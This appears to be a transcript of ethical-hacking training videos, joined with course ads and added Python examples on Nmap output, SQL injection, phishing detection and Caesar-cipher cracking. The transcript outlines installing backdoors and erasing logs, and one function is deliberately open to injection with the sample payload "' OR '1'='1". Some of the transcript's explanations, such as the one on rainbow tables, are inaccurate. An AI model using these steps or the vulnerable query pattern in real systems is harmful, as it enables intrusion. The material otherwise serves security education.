controls. All of these should be backed up by a global, or globally valid, certification related to networking, security, ethical hacking or the law of the land, anything and everything, maybe even programming; it is good to have a certification in PHP, Perl, Python, Ruby and so on. Why? Because most organizations, when they hire ethical hackers, look for these certifications, especially globally valid ones, so that they can be assured that the person they are hiring has the required skill set.

Let's talk about a few of the tools an ethical hacker would use in their testing scenarios. To be honest, there are hundreds of tools out there; what you see on the screen are just a few examples. Nessus is a vulnerability scanner. What is a vulnerability scanner? It is an automated tool designed to identify vulnerabilities within hosts, operating systems and networks. These tools come with ready-made databases of all the vulnerabilities that have already been identified, and they scan the network against that database to find any possible flaws or vulnerabilities that currently exist on the host, the operating system or the network. Similarly, there are application scanners like Acunetix or Arachni that help you scan applications and identify flaws within them.

Now, all of these are automated tools. The essence of the ethical hacker is that when these tools churn out their reports, the ethical hacker can understand and analyze them, identify the flaws, and then craft their own exploits or use existing exploits in a particular manner so that they can gain access or bypass the security controls that are already in place. How can they do that? With a tool called Metasploit. You see that big M on the right-hand side: that logo is for Metasploit, which is a penetration
testing tool. What is a penetration testing tool? It is the tool that allows an ethical hacker to craft or choose their exploits for the vulnerabilities that have been identified by Nessus. Since we are interacting with computers, we will always be interacting using tools, right? So the first tool, Nessus, identifies the flaws and the possible list of vulnerabilities; then we do a penetration test using Metasploit to validate those flaws, to verify that they actually exist and to figure out their complexity. That's where Metasploit helps us.

Wireshark would be used in the background while we are doing both of these activities with Nessus or Metasploit, to keep track of what packets are being sent and received on the network, which helps us analyze those packets. So whenever I run a Nessus scan, I would run Wireshark in the background: it captures the data packets, and I can go through them and analyze them to identify what Nessus is actually trying to do. Similarly, when I attack a machine using an exploit in Metasploit, I keep Wireshark running in the background to capture the packets that have been sent and the responses I have received from the victim, so that I can go through those packets too, analyze the responses and analyze the attack: whether it was successful and to what extent. It basically also gives me a validation, a proof, of the activity that happened.

Nmap is another automated tool that allows me to scan for open ports and protocols. Why would I use Nmap? Because ports and protocols become an entry point for a hacker to gain access to devices. For example, when we connect to a web server, we connect through a web browser, but we automatically connect to port 80 using HTTP, and port 443 is used for HTTPS. So if I am connecting to a web server using HTTPS, it is safe to assume that port 443 on the web server is open to accept those connections.
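An Nmap result is only as useful as the baseline it is compared against: port 443 open on a web server is expected, a database port open on the same host is the kind of leftover service a misconfigured server exposes. As an added example (not the speaker's code; the hosts, hostnames and the expected-port baseline are constructed), the block below parses a report in Nmap's grepable (-oG) output format and reports every open port that the baseline does not allow, which is how a defender turns a scan into a finding.

```python
import re

# Constructed sample in the shape of Nmap's grepable (-oG) output; not a real scan.
# Each port entry reads: port/state/protocol/owner/service/rpc info/version/
SAMPLE_GNMAP = (
    "# Nmap scan report (constructed sample)\n"
    "Host: 10.0.0.5 (web01.example.internal)\tPorts: 22/open/tcp//ssh///, "
    "80/open/tcp//http///, 443/open/tcp//https///, 3306/open/tcp//mysql///"
    "\tIgnored State: closed (996)\n"
    "Host: 10.0.0.6 (web02.example.internal)\tPorts: 80/open/tcp//http///, "
    "443/open/tcp//https///\tIgnored State: closed (998)\n"
)

# What each host is supposed to expose, assumed for the example; in practice this
# comes from the server's build documentation or a previously approved scan.
BASELINE = {
    "10.0.0.5": {22, 80, 443},
    "10.0.0.6": {80, 443},
}

PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/[^/]*/([^/]*)/")


def parse_gnmap(text):
    """Return {host_ip: {port: service}} for every open port in a -oG report."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comment lines and hosts with no ports listed
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        open_ports = {}
        for port, state, _proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                open_ports[int(port)] = service or "unknown"
        hosts[ip] = open_ports
    return hosts


def unexpected_exposure(scan, baseline):
    """Open ports per host that the baseline does not allow: review or close them."""
    findings = {}
    for ip, ports in scan.items():
        extra = set(ports) - baseline.get(ip, set())
        if extra:
            findings[ip] = {p: ports[p] for p in sorted(extra)}
    return findings


if __name__ == "__main__":
    for ip, ports in unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), BASELINE).items():
        for port, service in ports.items():
            print(f"{ip}: port {port} ({service}) is open but not in the baseline")
```

On the constructed sample the only finding is the MySQL port on the first web server; a host missing from the baseline altogether has every open port reported, which is the behaviour you want for an unknown machine that shows up in a scan.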
Similarly, there would be other services that may have been left open on the web server because nobody thought about configuring it, or because the web server was misconfigured and unwanted services were left running. Nmap allows me to scan those ports and services and understand what services are being offered on that server, so that I can then start analyzing the server, identify flaws within those services, and then try to attack them.

If the application I am analyzing is connected to a database and I want to do a SQL injection attack, or if Nessus tells me that a SQL injection attack may be possible on that particular application, I can use an automated tool called sqlmap that crafts all the queries required for a SQL injection attack and helps me carry out the attack at the same time. Here I do not have to create my own queries manually; the sqlmap tool creates them for me. What I would do is use Nessus to identify that particular flaw; if Nessus reports the flaw, I would then use sqlmap, configure it to attack that particular web server, and when I fire off the tool it automatically starts directing SQL injection queries at the database to see if the database is vulnerable and, if yes, what data can be retrieved from it.

So all of these tools, in a nutshell, help me hack networks, applications, operating systems and host devices, and this is what the ethical hacker does. They use these kinds of tool sets: they identify what attacks they need to do, they identify the right tool for that particular attack, they write their exploits and create those attacks, and then they start attacking, analyze the response, and give a report to the management providing feedback about how the attack was created or crafted, what the response to that attack was, and whether the attack was successful or not.
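The SQL injection that the talk has sqlmap testing for exists only because user input is pasted into the text of the query. As an added example (not the speaker's code; the users table and the inputs are constructed), here is the vulnerable lookup beside its parameterised replacement, run against an in-memory SQLite database so the difference is observable: the textbook `' OR '1'='1` input returns every row from the first function and nothing from the second.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """The flaw sqlmap looks for: the input is spliced into the SQL text, so a quote
    in the input ends the string literal and whatever follows is parsed as SQL."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """The fix: a parameterised query. The driver binds the value as data, so the
    same input is compared literally against the column and matches no user."""
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    probe = "' OR '1'='1"  # classic tautology; constructed test input
    print("vulnerable:", lookup_vulnerable(conn, probe))  # every row comes back
    print("safe:      ", lookup_safe(conn, probe))        # [] - no user has that name
```

The fix is not input filtering but keeping data out of the query grammar: with a bound parameter there is no string for a quote to close, so the whole class of payloads sqlmap would otherwise enumerate has nothing to act on.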
If successful, they would also give recommendations on what to do to prevent these attacks from happening in the future.

So when we want to launch these attacks, what is the process we follow? There are six steps we would take as an ethical hacker; if you are just a hacker, you probably wouldn't do the sixth step, which is the reporting step. The first step is the reconnaissance phase, the information gathering phase, which is very important from an ethical hacker's (or a hacker's) perspective, because if I want to attack someone or something as a digital device, I need to know what I am attacking: the IP address of the device, the MAC address, the operating system, the build or version of that operating system, the applications on top and their versions. For example, if I want to attack a server, assume it is a Windows-based server and use a particular tool to attack it, but it actually turns out to be a Linux-based server, my attacks are going to be unsuccessful. So I need to focus my attack on what is there at the other end, and in my information gathering phase I want to identify all of that information.

Once I have that information, I am going to scan those servers using tools like Nmap, which we just talked about, to see the open ports, open services and protocols running on the server that can give me possible entry points into the network, the device or the operating system. Along with the Nmap scan, I would run a vulnerability scanner (the Nessus vulnerability scanner we talked about, or Acunetix for applications) and try to identify vulnerabilities in those applications, operating systems or networks. Once I have identified those vulnerabilities in the scanning phase, I move on to the gaining access phase,
where I would then craft my exploits or choose existing exploits and start attacking the victim. At this point, if my attack is successful, I will probably have gained access, either by cracking passwords, by escalating privileges or by exploiting a vulnerability I found during the scanning phase.

Once I have gained access, I want to maintain that access. Why? Because the vulnerability may not be there for long: maybe somebody updates the operating system and the flaw no longer exists, or somebody changes the password I cracked, and thus I no longer have access. So what do I do to maintain my access? I install trojans or backdoor entries on those systems, using which I can secretly, in a covert manner, get access to those devices at my own will and at my own time, as long as those devices are available over the network. That is where I maintain my access: I have hacked them, and now I install software that gives me a backdoor entry to that device no matter what.

Once I have done this, I want to clear my tracks. Whatever activity I have been doing, for example installing a trojan (a trojan is also software, and once installed on the victim's machine it creates directories and files), I want to hide. If I have accessed data stores or modified data, I want to hide that activity, because if the victim comes to know that something has happened they would start increasing their security parameters, they might start scanning their devices, they might take them offline, and thus my hack would no longer be effective. The reason I am clearing my tracks is so that the victim doesn't find out that they have been hacked or compromised, or, even if they do find out, they cannot trace the compromise back to me. So I would be deleting references to any of the IP addresses or MAC addresses I may have used to attack that particular
device, and this is where I need to be able to identify where those logs were created and where those traces are. Once I remove those traces, the victim would be none the wiser about whether they have been compromised or who compromised their system.

If I am successful at all of these stages, or to whatever extent I have succeeded at any of them, I then create a report based on that and report to the management about the activities we have been able to do and whatever we achieved with them. For example: we identified 10 different flaws; there were 20 different attacks we wanted to do; which attacks did we do, what was the outcome of each, and what was the intended or expected output? I'll create a report giving a detailed analysis of all the steps that were taken, along with screenshots and evidence of what activity was conducted, what the output was and what the expected output was, and submit that report to the management, giving them an idea of what vulnerabilities and flaws exist in their environment or devices that need to be mitigated so that security can be enhanced.

So these are the six steps the ethical hacking process takes. Going through them briefly: reconnaissance is where you use hacking tools like Nmap and hping to obtain information about targets (there are hundreds of tools out there, depending on what information you want); in scanning, again Nmap and tools of that kind are used to identify open ports, protocols and services; in gaining access, you exploit a vulnerability using the Metasploit tool we talked about in the previous slides; in maintaining access, you install backdoors (you can use Metasploit, and at the same time you can craft your own scripts to create a trojan and install it on the victim's machine); once you have achieved that, clearing tracks is where you're going to
clear all evidence of your activity so that you do not get caught, or the victim doesn't even realize they have been hacked; and once you have done all of this, we create the reports to be submitted to the management to help them understand the current security evaluation of their organization.

Now let's see how we can hack using social engineering. What is social engineering? Social engineering is the art of manipulating humans into revealing confidential information which they otherwise would not have revealed. This is where your social skills and your people skills come into the picture: if you are able to communicate effectively with another person, they will probably give up more information than they intended to.

Let's look at some examples. If you see the phishing activity on the screen: what is phishing? We receive a lot of free emails on a regular basis. We have all received emails saying we have won a lottery of a few million dollars, without realizing that we never bought a lottery ticket in the first place. We have all had the Nigerian frauds, where a prince died in some South African country and you, out of 7 billion people on the planet, have been chosen to have a few hundred million transferred through your account, with 50% of that money offered to you as a thank-you. There are some very basic attacks where you go to a website and a banner flashes at you saying "Congratulations, you're the 1 millionth visitor to this website, click here to claim your prize." All of these are social engineering attacks: phishing attacks, fake websites, fake communications sent out to users to prey on their gullibility. Most humans have that dream of striking it rich, winning a huge lottery once and for all and living lavishly ever after, but sadly, in the real world, that doesn't happen that often, and if you are receiving those mails it is very
important that you first research the validity of those communications before you act upon them.

Why are humans susceptible to social engineering? Because humans have emotions and machines do not. Try pleading with a machine to give you access to an account you have forgotten the password to; the machine wouldn't even know what you are doing. Try pleading with a human, appealing to sympathy or empathy, and you could create a social engineering attack: you plead with them, saying that if you do not get access to this account immediately you might lose your job, and that would put your family in trouble. Somebody would feel empathy or sympathy towards you, help you reset that password and give you access to the account. How good the attack is, and how convincing you are, decides the success of this attack.

What is a familiarity exploit? Attackers interact with victims to gain information that will benefit the attack, for example to crack credentials such as passwords. If we want to reset our passwords, what mechanism do we have? We have security questions that we set up, and those questions are nothing but personal information that we would know; but through a social engineering attack, the information you have set for your security questions can easily be gathered. The security questions can be as simple as the first school you attended, which you probably have listed on your LinkedIn profile, where a person can just go in, see your academic qualifications and identify the school you were in. Similarly, it might be the question "what was your mother's maiden name?" That is a very good attack: if a person can interact with you, say by pretending to take a survey and approaching you for feedback on a product you have been using, and they ask you these questions, you wouldn't think twice before giving those answers.
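The lottery and prize emails described above can usually be spotted from their headers and wording before anyone acts on them. As an added example (not the speaker's code; the message, the trusted domain and the lure-word list are all constructed), the block below reads a raw email with Python's standard library and reports three indicators a mail filter or an analyst would look for: a Reply-To domain that differs from the From domain, a From domain that is a one- or two-character lookalike of a trusted one, and concentrated prize-style wording in the subject and body.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample message in the style of the lottery lures described above.
SAMPLE_EMAIL = """\
From: "Example Bank Security" <alerts@examp1e-bank.test>
Reply-To: claims@free-prize-center.test
To: victim@example.test
Subject: Congratulations! You have won $2,000,000 - act now

Dear customer, click here to claim your prize before it expires.
"""

# Domains the reader's organisation actually trusts (assumed for the example).
TRUSTED_DOMAINS = {"example-bank.test"}
# Wording typical of the prize and lottery lures described in the talk.
LURE_WORDS = ("congratulations", "won", "lottery", "prize", "act now", "claim")


def domain_of(address):
    """Lower-cased domain part of an address, or '' if there is none."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def edit_distance(a, b):
    """Levenshtein distance, used to spot lookalike domains such as examp1e vs example."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def phishing_indicators(raw):
    """Return a list of human-readable indicators; an empty list means none fired."""
    msg = email.message_from_string(raw, policy=policy.default)
    from_addr = parseaddr(str(msg.get("From", "")))[1]
    reply_addr = parseaddr(str(msg.get("Reply-To", "")))[1]
    from_domain, reply_domain = domain_of(from_addr), domain_of(reply_addr)
    indicators = []
    # 1. Replies are steered to a different domain than the one the mail claims to be from.
    if reply_domain and reply_domain != from_domain:
        indicators.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")
    # 2. The sender domain is almost, but not quite, a domain we trust.
    if from_domain and from_domain not in TRUSTED_DOMAINS:
        lookalikes = [d for d in TRUSTED_DOMAINS if edit_distance(d, from_domain) <= 2]
        if lookalikes:
            indicators.append(f"From domain {from_domain} is a lookalike of trusted {lookalikes[0]}")
    # 3. Several prize-style lure phrases across the subject and body together.
    body = msg.get_body(preferencelist=("plain",))
    text = (str(msg.get("Subject", "")) + " " + (body.get_content() if body else "")).lower()
    hits = [w for w in LURE_WORDS if w in text]
    if len(hits) >= 2:
        indicators.append("lure wording: " + ", ".join(hits))
    return indicators


if __name__ == "__main__":
    for indicator in phishing_indicators(SAMPLE_EMAIL):
        print("-", indicator)
```

None of the three checks is conclusive on its own (legitimate newsletters set a different Reply-To, and a genuine promotion may say "prize"), which is why the function returns the list of indicators rather than a verdict: the reader, or the mail gateway's scoring, weighs how many fired together.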
As long as the request sounds legitimate to us, we are able to justify it and we answer those queries. So it is upon us to verify the authenticity of a request before we answer it. Phishing, as discussed, would be fraudulent emails which appear to come from a trusted source, so email spoofing comes to mind, fake websites and so on. Exploiting human curiosity: curiosity killed the cat, right? There have been many physical attacks where hackers just leave pen drives lying around in a parking lot. This is an open, generic attack: whoever falls victim falls victim. If I throw around a few USB drives in a parking lot, obviously with trojans on them, some people who are curious, or who are looking for a freebie, might pick up those pen drives and plug them into their computers to see what data is on them, and once they plug them in, the virus or trojan infects the machine and causes harm to it. Then there is exploiting human greed: we just talked about the Nigerian frauds and the lotteries, those kinds of attacks, the fake money-making gimmicks. This is basically where you prey on the person's greed kicking in, and on them clicking those links in order to get the money that was promised to them in the email.

One of the safest mechanisms to keep data private and to keep yourself secure is encryption. Encryption happens through cryptography. What is cryptography? Cryptography is the art of scrambling data using a particular algorithm so that the data becomes unreadable to a normal user; only the person with the key to unscramble that data would be able to unscramble it and make sense of it. So we are making it unreadable by using a particular key or a particular algorithm, and then we send the key to the end user, who uses the same key to decrypt the data. If anybody compromises that data while it is
being sent over the network, since it is encrypted, they would not be able to read it. The encryption algorithm would be something like this: if you see the word "computer" on the screen, once made unreadable it would look like "eq o r xv gt". To an end user it wouldn't make any sense, but the person who has the key to unscramble it would be able to convert it back to "computer" and understand the meaning of the word. What is shown on the screen is a substitution cipher. What is the key? The key is alphabet + 3: c plus three letters becomes e, m becomes o, and so on. So the key used to scramble the data is: from the character you are at, the third character from there is the corresponding character. The encrypted message is also known as a cipher. Decryption is just the other way around: you now know the key, and you can figure out what that e corresponds to by going back three characters in the alphabet.

Most of the time, a certified ethical hacker must decrypt a message without knowing the secret key. Let's say a ransomware has affected your organization, or a device, and you want to decrypt that data. As an ethical hacker you wouldn't be paying a ransom to the hacker, would you? So it is now your prerogative to work around it and try to crack the encryption mechanism, to crack the cipher, decrypt the message and see what's within it. Decryption without the use of the secret key is known as cryptanalysis: cryptanalysis is the reversing of an algorithm to figure out what the decryption was without using a key. Cryptanalysis can be done in various ways: the first is a brute-force attack, the second is a dictionary attack, and the third is a rainbow table attack. A brute-force attack tries every permutation and combination of the key to figure out what the key was.
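The substitution cipher on the slide is a Caesar shift, and its key space is small enough to show the first two cryptanalysis methods named above in working code. As an added example (not the speaker's code; the word list and the test sentence are constructed), the block implements the shift for any key, then brute-forces all 26 keys and uses a dictionary, here a word list, to pick the key whose output reads as language. It also lets you check the slide yourself: shifting "computer" by 3 gives "frpsxwhu", while a shift of 2 gives "eqorwvgt", which is what the ciphertext quoted above matches apart from one letter. Rainbow tables, the third method named, are precomputed tables for reversing password hashes rather than cipher keys, and are not shown here.

```python
import string

ALPHABET = string.ascii_lowercase


def caesar(text, shift):
    """Shift every letter by `shift` places (mod 26); non-letters pass through unchanged."""
    out = []
    for ch in text.lower():
        if ch in ALPHABET:
            out.append(ALPHABET[(ALPHABET.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def decrypt(cipher, shift):
    """Decryption is the same operation with the key applied in reverse."""
    return caesar(cipher, -shift)


# Constructed mini word list standing in for a dictionary attack's word list.
WORDLIST = {"computer", "the", "password", "is", "secret", "message", "attack", "at", "dawn"}


def brute_force(cipher):
    """Brute force: try every possible key and return all (shift, candidate plaintext) pairs."""
    return [(s, decrypt(cipher, s)) for s in range(26)]


def crack(cipher, wordlist=WORDLIST):
    """Brute-force the key space, then use the word list to recognise the right key:
    the candidate containing the most dictionary words wins. Returns (shift, plaintext, score)."""
    best = None
    for shift, plain in brute_force(cipher):
        score = sum(1 for w in plain.split() if w.strip(".,!?") in wordlist)
        if best is None or score > best[2]:
            best = (shift, plain, score)
    return best


if __name__ == "__main__":
    print(caesar("computer", 2), caesar("computer", 3))  # the slide's word under both shifts
    intercepted = caesar("the secret message is attack at dawn", 7)  # constructed ciphertext
    print(intercepted)
    print(crack(intercepted))
```

The same two ideas scale to real systems in different ways: brute force is limited by key length (26 keys here, 2^128 for AES), and the dictionary step is what turns an unreadable pile of candidates into a recognised plaintext, which is exactly why the password testing described earlier relies on word lists rather than on exhaustive search.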
take a lot of time a dictionary attack is where you have created a list of possible encryption mechanisms a list of possible cracks and then you try to figure out whether those cracks work or not rainbow tables are where you have an encrypted text in hand and you’re trying to figure out uh the similarities between the text that you have and the encrypted data that you wanted to decrypt in the first place so in the brute force attack you’re trying every possible combination permutation of what the key would be in dictionary attack you have a word list that would tantamount to the key and if you’re you’re trying to match all the words listed in the text file or the word list to see if any of those words are going to work to decrypt that data here in the rainbow table the cipher text is compared with another cipher text you find out similarities and then you try to work or reverse engineer your way accordingly so let’s have a quick demo on cryptography before we end this session so to begin with the demo of cryptography we are on a website called spammimic.com which will help us scramble the message that we created into a completely format which would be unrelated to the topic at hand so if I say I want to encode a message turn a short message into spam so what this does is want to send across a secret message you type in the secret message a short one and it will convert that into a spam mail you send it across so whoever is reading that spam mail would never get an idea of the embedded message within it so if I want to type in a message here hi this is a secret message the password is askd at the rate 1 2 3 4 and I want to send this out to people or to one of my colleagues but I want to send it out in a secret manner so that others are not aware of this so when I press on encode what the algorithm would do is it will convert this message into a spam mail so my message hi this is a secret message the password is at the rate 1 2 3 4 or asd at the rate 1 2 3 4 gets 
converted into this now if you read it dear e-commerce professional this letter was specially selected to be sent to you this doesn’t make sense there is nowhere or no reference to the actual message that I’ve already said so if I copy this entire message and I send it let’s say via email to the recipient now the thing is that the recipient needs to know that I’ve encoded it using spam mimic the algorithm rem need needs to remain the same so once they know that it is spam mimic what they can do is now in this instance what I’m going to do is I’m going to open up a new browser and I’m going to go to the same website and at this point in time I’m going to click on decode when I click on decode I’m going to paste the message that I have just copied there we are and this message is now being copied into a different browser and if I decode this you will see that it will convert it back to the original message that there was so the key is there at spam mimic and uh it is embedded within the message so whenever we paste the message in the decode factor it knows what the key was and it can decrypt that message and give me the actual message that was embedded within it there we are the entire message this is what we created in the Google Chrome browser and in the Firefox browser we decoded similarly if I want to protect these kind of messages there is an aspen encrypt.com website where let’s say we use text encryption and I want to encrypt the same message this is a secret message the password is ASD at the rate 1 2 3 4 and then I give it a password to protect this message let’s say the word password and I use the cipher to scramble this by using let’s say AES which is the strongest cipher right now and I say encrypt so this is what the encryption would look like and basically uh if I don’t have the password over here if I decrypt it you would see that the error has occurred now if I type in the password over here and then decrypt it it will be able to convert that back 
into the unscrambled text and it will give me what the original message was this is a secret message the password is ASD at the rate 1 2 3 4 so if I want to keep my data secure from hackers I want to scramble it in such a way that they would not be able to crack it or it would be very difficult from for them to crack it and this is one of the first mechanisms that would be recommended by any ethical hacker and before we begin if you are someone who is interested in building a career in cyber security or to become an ethical hacker by graduating from the best universities or a professional who elicits to switch career with cyber security or ethical hacker by learning from the experts then try giving a show to simply learn postgraduate program in cyber security with modules from MIT Schwarzman College of Computing the course link is mentioned in the description box below that will navigate you to the course page where you can find a complete overview of the program being offered hello everyone and welcome to this video on the hackers road map at the simpleland YouTube channel as vast as the field of cyber security is there’s often an overflow of information about it at the same time for people who wish to know more about how to venture into the cyber security or ethical hacking space it is very important for them to know what’s the career progression what are the skills needed and how a person with no or bare minimum knowledge can take their first step in this amazing career well this video is for all those individuals who wish to pursue a career in the field of cyber security and ethical hacking whether you are an entry- level professional a college graduate or an experienced professional looking to understand how a career in the field of cyber security progresses and what additional skills and responsibilities would you need as you grow in the field then you are at the right place so let’s get started with our topic the hacker’s road map and before we begin if you 
are someone who is interested in building a career in cyber security by graduating from the best universities or a professional who elicits to switch careers with cyber security by learning from the experts then try giving a shot to simply lens postgraduate program in cyber security with modules from MIT Schwarzman College of Engineering the course link is mentioned in the description box that will navigate you to the course page where you can find a complete overview of the program being offered and if these are the types of videos you would like to watch then hit the subscribe button like and press on the bell icon to never miss on further content so stay tuned with us until the end of this video and don’t forget to register your opinion in the comment section below and now we will start with what is ethical hacking and how is it different from hacking so in the world of cyber security hacking can be broadly categorized into two types ethical hacking and unethical hacking ethical hacking involves using the same tools and techniques as malicious hackers to identify and fix security vulnerabilities before they can be exploited and these expert known as whitehead hackers work with a focus on security rather on theft and on the other hand we have unethical hacking that refers to unauthorized access to digital devices or networks with malicious intent performed by black hackers and additionally there are greyhackers who possess knowledge in offensive and defensive computer use sometimes working as security consultants during the day and engaging in blackhead activities at night it is important to understand these distinctions to protect against cyber threats effectively now we’ll see the objective or roles of an ethical hacker ethical hackers also known as whitehead hackers use their skills and expertise to identify vulnerabilities in system and network before malicious hackers can exploit them their primary objective is to simulate real world attacks and help 
organization strengthen their security measures the role of an ethical hacker involves several key phases and we’ll see those roles and key phases so they are responsible for reconnaissance scanning gain and maintain access clear their tracks document their findings and compile detailed reports so firstly they conduct thorough reconance gathering information about the target system or organization this includes understanding the organization structure network infrastructure and potential weak points and through scanning they identify the easiest and quickest methods to gain access to the network and gather further information and once access is gained ethical hackers maintain it allowing them to exercise their privileges and control the connected systems this step helps them identify any potential security flaws and weaknesses within the network they also work to clear their tracks covering their footsteps to evade detection and ensuring the security personnel cannot trace their activities and throughout the entire process ethical hackers document their findings compile detailed reports on the vulnerabilities discovered and provide recommendations to address and mitigate the identified security issues their vulnerability goal is to help organization strengthen their defenses prevent data breaches and protect sensitive information from falling into the wrong hands ethical hacking is a crucial aspect of cyber security as it allows organizations to stay one step ahead of cyber threats by leveraging the skills of ethical hackers businesses can proactively identify and address vulnerabilities ensuring the overall security and integrity of their digital infrastructure so now we’ll see the skills that needed to be an ethical hacker so now we’ll see the skills so the first skill is knowledge of computer networks then it’s the programming languages then the knowledge of web applications databases ethical hacking tools and knowledge of common attack vectors and techniques 
then what certificates that are required for an ethical hacker now we will start with knowledge of computer networks understanding computer networks is fundamental for ethical hackers this includes concepts such as IP addressing network protocols example TCP IP routing switching and firewalls a strong grasp of how networks function will enable you to identify vulnerabilities and potential entry points the next is programming languages proficiency in programming languages is essential for effective ethical hacking languages like Python Java C++ and scripting languages such as Pearl or Ruby are widely used in this field programming skills enable you to write custom scripts and tools automate task and exploit vulnerabilities and the next we have is web applications in today’s digital landscape web applications are often the target of attacks therefore a solid understanding of web application architecture protocols example HTTP and security mechanisms example SSL TLS is crucial knowledge of web programming languages like HTML CSS JavaScript and frameworks like PHP or ASP.NET is also beneficial then we have databases so databases store and manage sensitive data making them attractive targets for hackers familiarize yourself with database management systems DBMS such as MySQL Oracle or Microsoft SQL Server learn about database security including access control encryption and vulnerability assessment then we should focus on the skill to have a knowledge on ethical hacking tools so to perform ethical hacking task efficiently you should be familiar with various hacking tools these include network scanners example end mapap vulnerability scanners example Nessus password crackers jo the rier packet snipers wireshock and exploitation frameworks metasloit mastering these tools will enhance your effectiveness as an ethical hacker then you should have knowledge of common attack vectors and techniques that is understanding common attack vectors and techniques is vital for an 
ethical hacker this includes knowledge of different types of malware social engineering network attacks that is DDoS and web application vulnerabilities example cross-ite scripting staying up to date with the latest threats and attack methodologies is crucial for effective defense the next is certificates so obtaining relevant certifications demonstrates your expertise and commitment to the field certificates like certified ethical hacker CH offensive security certificate professional OCP or CompTIA security plus are highly regarded within the industry they validate your skills and can boost your credibility when seeking ethical hacking opportunities the C certification is a multiplechoice exam that evaluates your understanding of the penetration testing structure and the tools that are utilized inside it it gives job seekers the information security field a head start by ensuring that the certificate holder understands the fundamentals such as information gathering attacking computers or servers wireless attacks and social engineering so the objective CH is inform the public that credentialized individuals meet or exceed the minimum standards second establish and govern minimum standards of credentiality third professional information security specialist in ethical hacking so now we will have an exam overview so the exam name is EC council certified ethical hacker and the exam duration is 240 minutes and you will get questions that is 125 questions you will get in the exam and it is a multiplechoice question exam and the passing score you need is 70% and to register for the exam you should go to Pearson view or ECC exam center and eligibility criteria for CH is there are two ways to satisfy the eligibility criteria that is attend official CH training and this can be in any format example instructorled training computer-based training or live online training as long as the program is approved by EC council and attempt without official training in order to be 
considered for the EC council certification exam without attending official training you must have two or more years of documented information security experience ra non-refundable eligibility application fee of $100 submit completed CH exam eligibility form including verification from an employer upon approval EC council will email you a voucher number to register for the CH exam so this was all about the CH exam and now we will move to the steps to become ethical hacker so ethical hacking is an exciting and rapidly growing field that requires a combination of technical skills knowledge and a strong sense of ethics by following these steps you can begin your journey towards becoming an ethical hacker and contribute to enhancing cyber security so step one that is knowledge of computer systems and networks step two you should have proficiency in programming languages step three networking and security concepts you should have a knowledge of it third knowledge of web application and database fifth understanding of operating systems step six familiarity with ethical hacking tools step seven problem solving and analytical thinking step eight knowledge of common attack vectors and techniques step nine certifications so now we will elaborate all the steps one by one so we’ll start with knowledge of computer systems and networks so to become an ethical hacker it is crucial to have a deep understanding of computer systems and networks this involves familiarizing yourself with the inner workings of computer system network protocols operating systems and how different components interact within a network environment by gaining this knowledge you will be better equipped to identify vulnerabilities and assess potential security risk and the next is proficiency in programming languages so programming languages are an essential tool for ethical hackers by gaining proficiency in programming languages such as Python C++ Java JavaScript SQL Pearl and Ruby you will be able to 
develop your own scripts automate task and create exploit codes these programming languages provide the foundation for writing secure and efficient code as well as manipulating and analyzing data the next step is networking and security concepts to effectively assess and secure networks it is important to have a solid understanding of networking and security concept this includes familiarizing yourself with topics such as network protocols network security principles encryption techniques and firewall configurations understanding how data is transmitted secured and protected in a network environment will enable you to identify potential vulnerabilities and implement appropriate security measures step four knowledge of web application and database knowledge so in today’s interconnected world web applications and databases are common targets for hackers therefore it is crucial to develop a strong understanding of web application architectures web protocols and database systems pay special attention to common vulnerabilities specific to web applications such as SQL injection cross-ite scripting XSS and cross-sight request forgery CSRF by gaining expertise in these areas you will be able to effectively assess the security of web applications and databases and provide appropriate recommendations for securing them and the next step is understanding of operating systems so operating systems form the backbone of computer systems and are often targeted by hackers it is important to gain a comprehensive understanding of different operating systems such as Windows Linux or Mac OS this includes understanding system configurations file permissions user management and security mechanisms specific to each operating system this knowledge will enable you to identify vulnerabilities apply patches and secure operating systems effectively step six familiarity with ethical hacking tools ethical hackers rely on a variety of tools to assess and secure systems and networks familiarize 
yourself with popular ethical hacking tools such as Matt Plot Wireshark Nap Burp Suit Kali Linux Canvas SQL Ninja and Bobby these tools provide functionalities for vulnerability scanning network sniffing exploit development and penetration testing understanding how to use these tools effectively will enhance your capabilities as an ethical hacker now we’ll see the step seven that is problem solving and analytical thinking so being an ethical hacker requires strong problem solving skills and the ability to think analytically you will often encounter complex systems and face intricate security challenges developing your problem solving abilities and analytical thinking will help you approach these challenges systematically identify vulnerabilities and deise effective strategies to mitigate risk it is essential to stay updated with the latest security trends and technologies to enhance your problem solving skills and the step it is knowledge of common attack vectors and techniques so to defend against potential threats you must familiarize yourself with common hacking techniques and attack vectors used by malicious hackers this includes social engineering fishing attacks password cracking network based attacks and more understanding how these attacks work and the methodologies used will enable you to proactively identify and prevent potential security breaches and now the step nine that is certifications while certifications are not mandatory to start a career in ethical hacking they can provide a structured learning path and validate your skills and knowledge consider pursuing certifications such as certified ethical hacker CH Offensive Security Certified Professional OCP Certified Information System Security Professional CISSP Certified Penetration Testing Engineer CPTE and Certified Security Analyst ECSA these certifications demonstrate your expertise and dedication to the field enhancing your credibility as an ethical hacker now we’ll see the job roles in ethical 
